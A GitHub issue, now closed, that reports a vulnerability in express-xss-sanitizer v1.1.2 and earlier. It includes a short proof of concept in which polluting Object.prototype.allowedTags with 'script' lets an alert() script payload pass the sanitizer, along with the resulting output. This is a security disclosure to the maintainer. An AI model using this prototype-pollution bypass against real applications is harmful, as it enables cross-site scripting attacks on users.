Skip to content

XSS bypass by using prototype pollution #4

Closed
@jayateertha043

Description

@jayateertha043

Issue: express-xss-sanitizer doesn't sanitize xss payloads properly, when the client is already affected by prototype pollution.

Affected versions: v1.1.2 and earlier

Code -

//Refer https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/ for more information

var expressXssSanitizer = require("express-xss-sanitizer");
var data = "<h1>Hi</h1><script>alert()</script>";
Object.prototype.allowedTags = ['script'];
data = expressXssSanitizer.sanitize(data, {});
console.log(data);

Output -

"\n\n⚠️ Your `allowedTags` option includes, `script`, which… option\nand ensure you are accounting for this risk.\n\n"
"Hi<script>alert()</script>"

For Live POC - https://runkit.com/embed/w306l6zfm7tu
Refer https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/ for more information.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions